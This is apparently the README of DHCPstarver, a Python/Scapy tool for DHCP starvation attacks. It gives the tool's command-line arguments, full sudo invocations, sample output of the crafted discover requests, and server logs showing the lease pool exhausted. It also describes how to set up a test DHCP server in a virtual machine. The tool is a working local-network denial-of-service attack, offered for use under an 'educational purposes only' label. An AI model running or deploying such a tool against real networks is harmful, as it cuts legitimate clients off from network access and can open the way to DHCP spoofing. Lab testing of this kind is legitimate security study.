DHCPstarver is a tool to perform a DHCP starvation attack.
####################################################
# This tool is designed for educational purposes only #
####################################################
- DHCPStarver
- Requirements
- Some sources - Thanks to
- Command line arguments
- How DHCPstarver make DHCP discover
- Differents modes of use
- How to test DHCPstarver on your own DHCP server (virtual machine here)
DHCPstarver use differents libraries :
- netaddr to manage subnet and iterate availables hosts
- argparse to manage command line arguments
- netifaces to get all available interfaces
- scapy to craft DHCP discover request
- termcolor to add color in your bland and dull terminal (huhu, just kidding)
netaddr==0.7.19
argparse==1.2.1
netifaces==0.10.4
scapy==2.4.3
termcolor==1.1.0
Just run pip3 install -r requirements.txt to install all modules needed by DHCPstarver
-
About DHCP starvation attack :
http://www.omnisecu.com/ccna-security/dhcp-starvation-attacks-and-dhcp-spoofing-attacks.php -
Answer checking in scapy :
https://0xbharath.github.io/art-of-packet-crafting-with-scapy/scapy/sending_recieving/index.html -
Scapy documentation :
https://scapy.readthedocs.io/en/latest/introduction.html -
Formatting DHCP discover request :
https://www.riccardoancarani.it/playing-with-dhcp/ -
Another good website to understand DHCP starvation :
https://cabeggar.github.io/2016/02/21/DHCP-starvation-with-ScaPy/
Thanks to D@da for his regex (unfortunately not used), but appreciated it !
re.findall('([0-9]*.[0-9]*.[0-9]*.[0-9]*):bootpc /', str(answer))View the end of makeDHCPRequest() function
DHCPstarver needs some arguments :
-
-ito specify interface which will be use to make DHCP discover request
DHCPstarver check if the interface exist before make request -
-sto specify a subnet, with CIDR notation
A DHCP discover request implies that the client doesn't have a IP address yet, but the subnet will be used to loop on each available IP address availables in a DHCP server -
-tto add a specific timeout for each DHCP discover request (default is 0) -
-rto add a number of retry to each DHCP discover request (default is 0, only 1 DHCP discover)
If the number of retry is equal to 0, this value will be increased to 1, Scapy needs to make at least one request -
-dto make Scapy more verbose, it only addverbose = Truein Scapy crafted requests
DHCP discover is the first request of an host when no IP address is set.
The client craft a request with :
At layer 2
- hardware MAC address source (random mac with DHCPstarver, with RandMAC() function in Scapy)
- ff:ff:ff:ff:ff:ff destination MAC address (broadcast address for 2nd layer)
At layer 3
- 0.0.0.0 source IP address
- 255.255.255.255 destination IP address (broadcast for 3rd layer)
DHCPstarver can be used in fast or slow and more verbose mode.
The slow mode is only available if the timeout is greater than 4 and the number of retry is greater than 1
It is arbitrarily assumed that without timeout and without retry specifieds, we want the minimum amount of information
To use DHCPstarver in fast mode, just specify :
- a timeout greater than 4, at minimum
-t 5 - a number of retry greater than 1, at minimum
-r 1
The slow mode increase automatically the verbosity, to display a received DHCP offer with :
- offered IP address
- informations about DHCP server (mac address, IP address)
Notes that several DHCP servers can respond due to the
multi = Truein the crafted request in Scapy
Sometimes, Scapy doesn't seem to receive DHCP offers, but can be view with a standard sniffer (TCPDump, Wireshark...)
With command line sudo python3 DHCPStarver.py -i vboxnet0 -r 3 -s 10.0.10.0/24 -t 5 -r 3 :
_____ _ _ _____ _____ _
| __ \| | | |/ ____| __ \ | |
| | | | |__| | | | |__) |__| |_ __ _ _ ____ _____ _ __
| | | | __ | | | ___/ __| __/ _` | '__\ \ / / _ \ '__|
| |__| | | | | |____| | \__ \ || (_| | | \ V / __/ |
|_____/|_| |_|\_____|_| |___/\__\__,_|_| \_/ \___|_|
[+] Craft and send frame with 73:81:34:af:8f:fe mac address
- send frame [1/3]
[+] DHCP offer : 10.0.10.180 (from 08:00:27:00:8c:ce - 10.0.10.10)
[+] Craft and send frame with f9:f1:ee:0c:b0:f4 mac address
- send frame [1/3]
[+] DHCP offer : 10.0.10.181 (from 08:00:27:00:8c:ce - 10.0.10.10)
[+] Craft and send frame with e0:c5:a7:bb:98:38 mac address
- send frame [1/3]
- send frame [2/3]
- send frame [3/3]
[-] Scapy failed to recover DHCP offer, may be with another sniffer...
[+] Craft and send frame with 4e:c3:fe:ac:f5:02 mac address
- send frame [1/3]
- send frame [2/3]
- send frame [3/3]
[-] Scapy failed to recover DHCP offer, may be with another sniffer...
[+] Craft and send frame with e5:02:46:3d:3d:a4 mac address
- send frame [1/3]
[+] DHCP offer : 10.0.10.188 (from 08:00:27:00:8c:ce - 10.0.10.10)
[...]
The fast can be used with :
- a timeout set lower than 5, at minimum
-t 4 - a number of retry lower than 2, at minimum
-r 1
With command line sudo python3 DHCPStarver.py -i vboxnet0 -r 3 -s 10.0.10.0/24 :
_____ _ _ _____ _____ _
| __ \| | | |/ ____| __ \ | |
| | | | |__| | | | |__) |__| |_ __ _ _ ____ _____ _ __
| | | | __ | | | ___/ __| __/ _` | '__\ \ / / _ \ '__|
| |__| | | | | |____| | \__ \ || (_| | | \ V / __/ |
|_____/|_| |_|\_____|_| |___/\__\__,_|_| \_/ \___|_|
[+] Craft and send frame with 4d:f0:3a:fa:ca:4b mac address
[+] Craft and send frame with c3:ab:d6:82:4d:d6 mac address
[+] Craft and send frame with fa:7d:53:4c:e6:24 mac address
[+] Craft and send frame with 29:d8:93:c5:16:28 mac address
[+] Craft and send frame with 14:fe:ad:5b:00:ca mac address
[+] Craft and send frame with 94:04:0e:e8:17:92 mac address
[+] Craft and send frame with c7:6e:bc:62:3f:56 mac address
[+] Craft and send frame with 8a:b8:a9:4b:b0:47 mac address
[+] Craft and send frame with 0c:db:96:03:c6:e8 mac address
[+] Craft and send frame with 4a:f0:38:98:14:fd mac address
[+] Craft and send frame with 74:a9:87:14:9e:ba mac address
[+] Craft and send frame with d4:81:9d:1f:a3:da mac address
[...]
On your favorite Linux distribution, you can install isc-dhcp-server
On a Debian distrib, just run apt-get install isc-dhcp-server to install it
In /etc/dhcp/dhcpd.conf, set the content like :
default-lease-time 600;
max-lease-time 7200;
subnet 10.0.10.0 netmask 255.255.255.0 {
range 10.0.10.100 10.0.10.200;
option broadcast-address 10.0.10.255;
option routers 10.0.10.254;
}
This content create a DHCP pool for 10.0.10.0/24 subnet :
- IP pool start at 10.0.10.100
- IP pool end at 10.0.10.200
- Broadcast address is 10.0.10.255
- The default gateway will be 10.0.10.254
In /etc/default/isc-dhcp-server, set the value INTERFACESv4="" with your interface where your DHCP server will listen requests.
In my case, the value is INTERFACESv4="enp0s3" (depend of your context)
Finally, use service isc-dhcp-server command to start your DHCP server
If the starvaton attack is completed, DHCP server logs looks like :
root@dhcpSRV:/var/log# tail -f syslog|grep --color dhcpd
Oct 24 13:36:23 dhcpSRV dhcpd[414]: DHCPDISCOVER from 30:65:3a:31:62:3a via enp0s3: network 10.0.10.0/24: no free leases
Oct 24 13:36:23 dhcpSRV dhcpd[414]: DHCPDISCOVER from 66:35:3a:36:31:3a via enp0s3: network 10.0.10.0/24: no free leases
Oct 24 13:36:23 dhcpSRV dhcpd[414]: DHCPDISCOVER from 34:30:3a:30:31:3a via enp0s3: network 10.0.10.0/24: no free leases
Oct 24 13:36:23 dhcpSRV dhcpd[414]: DHCPDISCOVER from 63:39:3a:37:32:3a via enp0s3: network 10.0.10.0/24: no free leases
Oct 24 13:36:23 dhcpSRV dhcpd[414]: DHCPDISCOVER from 36:31:3a:31:33:3a via enp0s3: network 10.0.10.0/24: no free leases
Oct 24 13:36:23 dhcpSRV dhcpd[414]: DHCPDISCOVER from 63:36:3a:32:63:3a via enp0s3: network 10.0.10.0/24: no free leases
Oct 24 13:36:24 dhcpSRV dhcpd[414]: DHCPDISCOVER from 36:37:3a:38:65:3a via enp0s3: network 10.0.10.0/24: no free leases
Oct 24 13:36:24 dhcpSRV dhcpd[414]: DHCPDISCOVER from 62:32:3a:65:62:3a via enp0s3: network 10.0.10.0/24: no free leases
Oct 24 13:36:24 dhcpSRV dhcpd[414]: DHCPDISCOVER from 32:65:3a:30:65:3a via enp0s3: network 10.0.10.0/24: no free leases
Oct 24 13:36:24 dhcpSRV dhcpd[414]: DHCPDISCOVER from 61:61:3a:37:30:3a via enp0s3: network 10.0.10.0/24: no free leases
[...]
At this time, a client can be request any IP address